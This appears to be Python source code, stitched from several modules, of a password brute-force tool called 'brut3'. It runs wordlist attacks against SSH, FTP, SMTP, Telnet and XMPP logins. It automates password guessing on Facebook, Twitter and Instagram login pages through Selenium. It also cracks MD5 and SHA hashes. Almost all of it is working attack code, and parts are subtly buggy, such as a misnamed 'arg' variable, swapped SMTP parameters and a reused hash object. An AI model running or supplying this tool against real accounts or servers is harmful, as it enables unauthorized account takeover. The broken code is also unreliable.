def execute(self):
if self.address is None:
colors.error("[!] You need to provide an address for cracking! [!]")
exit(1)
print(C + "[*] Address: {}".format(self.address) + W)
time.sleep(0.5)
if self.port is None:
if self.service == "ssh":
self.port = 22
elif self.service == "ftp":
self.port = 21
elif self.service == "smtp":
colors.warn("[?] NOTE: SMTP has several ports for usage, including 25, 465, 587")
self.port = 25
elif self.service == "telnet":
self.port = 23
elif self.service == "xmpp":
self.port = 5222
colors.warn("[?] Port not set. Automatically set to {} for you [?]".format(self.port))
print(C, "[*] Port: {}".format(self.port), W)
time.sleep(1)
print(P, "[*] Starting dictionary attack! [*]", W)
print("Using {} seconds of delay. Default is 1 second.".format(self.delay))
# Call respective methods
if self.service == "ssh":
os.system("mkdir tmp/")
self.sshBruteforce(self.address, self.username, self.wordlist, self.port, self.delay)
elif self.service == "ftp":
self.ftpBruteforce(self.address, self.username, self.wordlist, self.port, self.delay)
elif self.service == "smtp":
self.smtpBruteforce(self.address, self.username, self.wordlist, self.port, self.delay)
elif self.service == "telnet":
self.telnetBruteforce(self.address, self.username, self.wordlist, self.port, self.delay)
elif self.service == "xmpp":
self.xmppBruteforce(self.address, self.username, self.wordlist, self.port, self.delay)
def ftpBruteforce(self, address, username, wordlist, port, delay):
wordlist = open(wordlist, 'r')
ftp = ftplib.FTP()
for i in wordlist.readlines():
password = i.strip("\n")
try:
ftp.connect(address, port)
ftp.login(username, password)
colors.good("[*] Username: {} | [*] Password found: {}\n".format(username, password))
ftp.quit()
wordlist.close()
exit(0)
except ftplib.error_perm:
colors.warn("[*] Username: {} | [*] Password: {} | Incorrect!\n".format(username, password))
time.sleep(delay)
except ftplib.all_errors as e:
colors.error("Error caught! {}".format(e))
except KeyboardInterrupt:
ftp.quit()
wordlist.close()
exit(1)
def sshBruteforce(self, address, username, wordlist, port, delay):
wordlist = open(wordlist, 'r')
# Processing wordlist...
for i in wordlist.readlines():
password = i.strip("\n")
try:
response = self.ssh_connect(address, username, password, port)
if response == 0:
colors.good("[*] Username: {} | [*] Password found: {}\n".format(username, password))
elif response == 1:
colors.warn("[*] Username: {} | [*] Password: {} | Incorrect!\n".format(username, password))
time.sleep(delay)
elif response == 2:
colors.error("[!] Error: Connection couldn't be established to address. Check if host is correct, or up! [!]")
exit(1)
except Exception as e:
colors.error("Error caught! {}".format(e))
pass
except KeyboardInterrupt:
exit(1)
wordlist.close()
def xmppBruteforce(self, address, username, wordlist, port, delay):
wordlist = open(wordlist, 'r')
client = Client(str(address))
client.connect(server=(str(address), port))
for i in wordlist.readlines():
password = i.strip("\n")
try:
if client.auth(username, password):
client.sendInitPresence()
colors.good("[*] Username: {} | [*] Password found: {}\n".format(username, password))
client.disconnect()
wordlist.close()
exit(0)
except Exception as e:
colors.error("Error caught! Name: {}".format(e))
except KeyboardInterrupt:
client.disconnect()
wordlist.close()
exit(1)
except:
colors.warn("[*] Username: {} | [*] Password: {} | Incorrect!\n".format(username, password))
time.sleep(delay)
def execute(self):
wordlist = open(self.wordlist, 'r')
for i in wordlist.readlines():
password = i.strip("\n")
self.hashtype.update(password.encode('utf-8'))
checkedHash = self.hashtype.hexdigest()
try:
if checkedHash != self.targetHash:
colors.warn(
"[*] Target Hash: {} | [*] Current Hash: {} | [*] Cleartext: {} | Incorrect!"
.format(self.targetHash, checkedHash, password))
time.sleep(self.delay)
elif checkedHash == self.targetHash:
colors.green(
"[*] Target Hash: {} | [*] Current Hash: {} | [*] Cleartext: {} | Found!"
.format(self.targetHash, checkedHash, password))
wordlist.close()
exit(0)
except KeyboardInterrupt:
wordlist.close()
exit(1)
def smtpBruteforce(self, address, username, wordlist, delay, port):
wordlist = open(wordlist, 'r')
s = smtplib.SMTP(str(address), port)
for i in wordlist.readlines():
password = i.strip("\n")
try:
s.ehlo()
s.starttls()
s.ehlo
s.login(str(username), str(password))
colors.good("[*] Username: {} | [*] Password found: {}\n".format(username, password))
s.close()
wordlist.close()
exit(0)
except smtplib.SMTPAuthenticationError:
colors.warn("[*] Username: {} | [*] Password: {} | Incorrect!\n".format(username, password))
time.sleep(delay)
except Exception as e:
colors.error("Error caught! %s".format(e))
except KeyboardInterrupt:
s.close()
wordlist.close()
exit(1)
def main():
print("""
_ _ _____
| |__ _ __ _ _| |_|___ /
| '_ \| '__| | | | __| |_ \
| |_) | | | |_| | |_ ___) |
|_.__/|_| \__,_|\__|____/
security-oriented bruteforce tool.
""")
parser = argparse.ArgumentParser(
description='Bruteforce framework written in Python')
required = parser.add_argument_group('required arguments')
required.add_argument('-s', '--service', dest='service', help="Provide a service being attacked.\
The Protocols and Services supported are SSH, FTP, SMTP, XMPP, TELNET, INSTAGRAM, FACEBOOK, TWITTER, MD5, SHA1, SHA224" ,\
metavar='', choices=['ssh', 'ftp', 'smtp', 'xmpp', 'telnet', 'instagram', 'facebook', 'twitter', 'md5', 'sha1', 'sha224'])
required.add_argument(
'-u',
'--username',
dest='username',
help=
'Provide a valid username/hashstring for service/protocol/hashcrack being executed'
)
required.add_argument('-w',
'--wordlist',
dest='wordlist',
help='Provide a wordlist or directory to a wordlist')
parser.add_argument(
'-a',
'--address',
dest='address',
help=
'Provide host address for specified service. Required for certain protocols'
)
parser.add_argument(
'-p',
'--port',
type=int,
dest='port',
help=
'Provide port for host address for specified service. If not specified, will be automatically set'
)
parser.add_argument(
'-d',
'--delay',
type=int,
dest='delay',
help=
'Provide the number of seconds the program delays as each password is tried'
)
args = parser.parse_args()
# Specify mandatory options.
man_options = ['username', 'wordlist']
for m in man_options:
if not args.__dict__[m]:
parser.print_help()
colors.error(
"[!] You have to specify a username AND a wordlist! [!]")
exit(1)
# Detect if service arg is provided
if args.service is None:
colors.error("[!] No service provided! [!]")
exit(1)
# Detect is wordlist path is correct
if os.path.exists(args.wordlist) == False:
colors.error("[!] Wordlist not found! [!]")
exit(1)
# Check if the service provided is for hashcracking.
if args.service in HASHCRACK:
colors.warn("[!] Hashcrack detected! [!]")
colors.good("[*] Hashstring: {}".format(args.username))
else:
colors.good("[*] Username: {}".format(args.username))
time.sleep(0.5)
colors.good("[*] Wordlist: {}".format(args.wordlist))
time.sleep(0.5)
print(C + "[*] Service: {}".format(arg.service) + W)
if args.delay is None:
colors.warn("[?] Delay not set! Default to 1 [?]")
args.delay = 1
time.sleep(0.5)
# main program execution
if args.service in colors.PROTOCOLS:
# perform protocol-based bruteforce
p = protocols.ProtocolBruteforce(args.service, args.address,
args.username, args.wordlist,
args.port, args.delay)
p.execute()
elif args.service in colors.WEB:
# Web services do not require addresses or ports
if args.address or args.port:
colors.error(
"[!] NOTE: You don't need to provide an address OR port [!]")
exit(1)
# perform web-based bruteforce
w = web.WebBruteforce(args.service, args.username, args.wordlist,
args.delay)
w.execute()
elif args.service in colors.HASHCRACK:
# Hashcrack does not require address or port
if args.address or args.port:
colors.error(
"[!] NOTE: You don't need to provide an address OR port [!]")
exit(1)
# perform hashcracking
h = hashcrack.HashCrack(args.service, args.username, args.wordlist,
args.delay)
h.execute()
def webBruteforce(self, username, wordlist, service, delay):
driver = webdriver.Firefox()
if service == "facebook":
driver.get("https://touch.facebook.com/login?soft=auth/")
elif service == "twitter":
driver.get("https://mobile.twitter.com/session/new")
elif service == "instagram":
driver.get("https://www.instagram.com/accounts/login/")
wordlist = open(wordlist, 'r')
for i in wordlist.readlines():
password = i.strip("\n")
try:
sleep(2) # wait for all elements to load
# Find username element dependent on service
if service == "facebook":
elem = driver.find_element_by_name("email")
elif service == "twitter":
elem = driver.find_element_by_name(
"session[username_or_email]")
elif service == "instagram":
elem = driver.find_element_by_name("username")
elem.clear()
elem.send_keys(username)
# Find password element dependent on service
if service == "facebook":
try:
elem = driver.find_element_by_name("pass")
except NoSuchElementException:
elem.send_keys(Keys.RETURN)
elem = driver.find_element_by_name("pass")
elif service == "twitter":
elem = driver.find_element_by_name("session[password]")
elif service == "instagram":
elem = driver.find_element_by_name("password")
elem.clear()
elem.send_keys(password)
elem.send_keys(Keys.RETURN)
sleep(
delay
) # need to wait for page to load, sleep for delay seconds.
# Check for changes in driver.title
if service == "facebook":
assert (("Log into Facebook | Facebook") in driver.title)
elif service == "twitter":
assert (("Twitter") in driver.title)
elif service == "instagram":
assert (("Instagram") in driver.title)
colors.warn(
"[*] Username: {} | [*] Password: {} | Incorrect!\n".
format(username, password))
sleep(delay)
except AssertionError:
# AssertionError: successful login, since we do not see the string in the title, meaning
# that the page has changed.
colors.good(
"[*] Username: {} | [*] Password found: {}\n".format(
username, password))
exit(0)
except Exception as e:
colors.error("Error caught! {}".format(e))
exit(1)